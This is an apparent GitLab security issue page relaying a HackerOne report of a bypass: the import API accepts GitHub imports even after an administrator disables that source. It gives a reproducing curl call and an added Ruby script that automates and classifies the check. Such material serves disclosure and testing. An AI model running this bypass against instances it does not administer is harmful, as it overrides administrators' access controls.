GitLab.org / GitLab issue #27221 (Closed)
Issue created Mar 08, 2019 by GitLab SecurityBot@gitlab-securitybotReporter

Github project import restriction bypass

HackerOne report #497975 by xanbanx on 2019-02-19, assigned to estrike:

A GitLab administrator can restrict the import sources and disable the Github import from the admin interface.

However, this restriction can be bypassed by any user by importing the Github project via the import API rather than using the web interface: https://docs.gitlab.com/ee/api/import.html#doc-nav

Steps To Reproduce:

Tested on a local installation of GitLab 11.8.0-pre (gitlab-ce@3dca5b307683e9f91941d6ddafaace6d856f8c7b)

  1. As the administrator, go to http://example.gitlab.com/admin/application_settings and disable the GitHub import source as shown in the screenshot below
  2. As a user named, e.g., user, perform the following API call:

     curl --request POST --header "PRIVATE-TOKEN: <your-GL-Token>" --data "personal_access_token=<GH-Token>&repo_id=1&target_namespace=user" https://example.gitlab.com/api/v4/import/github

  3. Instead of raising an error message, the API correctly imports the repository from GitHub

Impact

The user bypasses the restriction of import sources set up by the administrator

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

  • Screenshot_20190219_141841.png
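As an added example that is not part of the HackerOne report or of GitLab's own code, the Ruby script below automates the three reproduction steps against an instance you administer and classifies the outcome. It reads the admin "import sources" setting through GET /api/v4/application/settings (whose `import_sources` field lists the enabled sources), then repeats the report's POST /api/v4/import/github call with an ordinary user's token. The function and parameter names are my own; the classification assumes only that a 2xx response means the import was accepted and a 403 means it was refused, with anything else reported as inconclusive rather than guessed at.

```ruby
#!/usr/bin/env ruby
# Added example: probe whether the import API honours the admin's import-source
# restriction. Not GitLab code; all helper names here are hypothetical.
require 'json'
require 'net/http'
require 'uri'

# Pure decision logic, kept network-free so it can be unit-tested.
#   import_sources: Array of enabled source names from the admin setting
#   status:         integer HTTP status returned by POST /api/v4/import/github
def classify_import_result(import_sources, status)
  github_enabled = import_sources.include?('github')
  case status
  when 200, 201
    # Import accepted. If the admin disabled GitHub, that is the reported bypass.
    github_enabled ? :import_allowed_as_configured : :restriction_bypassed
  when 401
    :bad_gitlab_token
  when 403
    github_enabled ? :import_refused_despite_enabled : :restriction_enforced
  else
    # 404/422/5xx can stem from the GitHub token, repo_id or namespace, not the setting.
    :inconclusive
  end
end

# One request helper for both calls (GET when no form data, POST otherwise).
def api_request(base_url, token, path, form = nil)
  uri = URI.parse("#{base_url.chomp('/')}/api/v4#{path}")
  req = form ? Net::HTTP::Post.new(uri) : Net::HTTP::Get.new(uri)
  req['PRIVATE-TOKEN'] = token
  req.set_form_data(form) if form
  Net::HTTP.start(uri.host, uri.port, use_ssl: uri.scheme == 'https') { |http| http.request(req) }
end

# Step 1 equivalent: read which import sources the administrator left enabled.
def fetch_import_sources(base_url, admin_token)
  res = api_request(base_url, admin_token, '/application/settings')
  raise "settings lookup failed: HTTP #{res.code}" unless res.code == '200'
  JSON.parse(res.body).fetch('import_sources')
end

# Step 2 equivalent: the report's curl call, issued as a non-admin user.
def attempt_github_import(base_url, user_token, github_token, repo_id, target_namespace)
  res = api_request(base_url, user_token, '/import/github',
                    'personal_access_token' => github_token,
                    'repo_id' => repo_id.to_s,
                    'target_namespace' => target_namespace)
  res.code.to_i
end

if __FILE__ == $PROGRAM_NAME
  if ARGV.length == 6
    base, admin_token, user_token, gh_token, repo_id, ns = ARGV
    sources = fetch_import_sources(base, admin_token)
    status = attempt_github_import(base, user_token, gh_token, repo_id, ns)
    puts "import_sources=#{sources.inspect} import_status=#{status} -> #{classify_import_result(sources, status)}"
  else
    warn "usage: #{$PROGRAM_NAME} BASE_URL ADMIN_TOKEN USER_TOKEN GITHUB_TOKEN REPO_ID TARGET_NAMESPACE"
  end
end
```

Run it only against an instance you own: a `:restriction_bypassed` or `:import_allowed_as_configured` result means a project was really created under the target namespace and should be deleted afterwards. Use a token for an ordinary user for the import step, as the report does, so the result reflects what a non-admin can do rather than what an administrator is permitted.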